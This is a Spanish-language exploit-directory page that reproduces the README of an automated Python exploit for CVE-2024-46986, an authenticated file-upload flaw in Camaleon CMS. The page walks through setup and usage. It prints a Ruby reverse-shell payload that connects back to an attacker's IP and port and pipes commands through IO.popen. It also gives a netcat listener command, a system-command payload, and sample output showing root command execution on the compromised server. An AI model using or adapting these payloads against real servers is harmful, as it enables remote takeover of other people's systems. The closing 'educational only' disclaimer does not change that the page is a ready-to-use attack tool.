Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-46986 — Exploit automatizado en Python para la vulnerabilidad de carga arbitraria de archivos en Camaleon CMS (CVE-2024-46986). Admite cargas útiles de shell inversa y ejecución de comandos para la ejecución remota de código autenticada. | Kitploit
Herramientas/GitHubGitHub/vidura2/cve-2024-46986
ExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubvidura2/cve-2024-46986

CVE-2024-46986

Exploit automatizado en Python para la vulnerabilidad de carga arbitraria de archivos en Camaleon CMS (CVE-2024-46986). Admite cargas útiles de shell inversa y ejecución de comandos para la ejecución remota de código autenticada.

Ver Repositorio
39hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-46986

Exploit de Camaleon CMS - Carga Arbitraria de Archivos

Este repositorio contiene un script en Python que automatiza la explotación de una vulnerabilidad de carga de archivos en Camaleon CMS. La vulnerabilidad permite a un atacante cargar archivos arbitrarios (como scripts de Ruby) en el servidor, lo que puede conducir a una ejecución remota de código (RCE) u otros impactos de seguridad graves.

Características

  • Exploit de carga de archivos: Carga scripts maliciosos de Ruby en el servidor objetivo.
  • Opciones de payload: Elija entre un payload de reverse shell y un payload de ejecución de comandos.
  • Ejecución repetida de comandos: Para el payload de ejecución de comandos, el script permite al usuario introducir comandos repetidamente.
  • Automatización: Automatiza todo el proceso mediante la librería requests de Python.

Requisitos previos

  • Credenciales de usuario válidas: Se requiere una sesión autenticada para que el exploit funcione. Necesita el auth_token y _cms_session de un usuario válido.

  • Python 3.x: Asegúrese de tener Python 3.x instalado.

  • Librería requests de Python: Instale la librería requests si aún no está instalada.

    root@kitploit:~
    pip install requests
    
  • Uso

    root@kitploit:~
    Clone el repositorio:
    
    bash
    

    https://github.com/vidura2/CVE-2024-46986.git cd CVE-2024-46986

    Modifique el script:

    root@kitploit:~
    Reemplace los marcadores your_auth_token_here, your_session_token_here y https://target_site_here en el script de Python con valores reales.
    Si utiliza el payload de reverse shell, reemplace también your_ip y your_port con su dirección IP y el puerto en el que configurará un listener.
    

    Elija el tipo de payload:

    root@kitploit:~
    Reverse Shell: Para cargar un reverse shell, establezca la variable payload_type en el script a "reverse_shell".
    Ejecución de comandos: Para cargar un script que ejecute comandos del sistema, establezca payload_type a "command_execution". Podrá introducir comandos repetidamente para ejecutarlos en el servidor objetivo.
    

    Ejecute el exploit:

    bash

    python exploit_camaleon.py

    Si utiliza el payload de ejecución de comandos, puede introducir varios comandos:

    bash

    root@kitploit:~
    Enter a system command to execute (or type 'exit' to quit): whoami
    Enter a system command to execute (or type 'exit' to quit): ls
    Enter a system command to execute (or type 'exit' to quit): exit
    

    Tipos de payload

    1. Reverse Shell

    El payload de reverse shell se conecta de vuelta a la máquina del atacante, lo que permite la ejecución remota de código en el servidor.

    root@kitploit:~
    Modifique la IP y el puerto en el script de Ruby dentro del código de Python.
    
    Ejemplo de payload:
    
    ruby
    

    require 'socket' s = TCPSocket.open('your_ip', your_port) while (cmd = s.gets) IO.popen(cmd, 'r') do |io| s.print io.read end end

    Configure un listener en su máquina usando netcat:

    bash

    root@kitploit:~
    nc -lvnp <your_port>
    

    2. Ejecución de comandos

    Este payload carga un script de Ruby que ejecuta comandos del sistema (p. ej., whoami) en el servidor. Puede introducir comandos repetidamente durante la ejecución.

    root@kitploit:~
    El script seguirá solicitando comandos hasta que escriba exit.
    Ejemplo:
    
    ruby
    
    system("whoami")
    

    Ejemplo de exploit exitoso

    Una vez que el exploit se ejecuta correctamente, debería ver una salida en la terminal que indique el éxito:

    python

    Exploit executed successfully with payload type: reverse_shell!

    Si utiliza el reverse shell, el listener de netcat debería darle acceso al shell del servidor comprometido.

    Para el payload de ejecución de comandos:

    bash

    Enter a system command to execute (or type 'exit' to quit): whoami Command 'whoami' executed successfully! Response: root

    Aviso legal

    Este script está destinado únicamente a fines educativos. El autor no es responsable de ningún uso indebido o daño causado por este exploit. Asegúrese siempre de tener permiso antes de probar o explotar vulnerabilidades. Contribuciones

    No dude en enviar issues o pull requests para mejoras o funcionalidades adicionales.

    Licencia

    Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para obtener más detalles.

    Descargar herramienta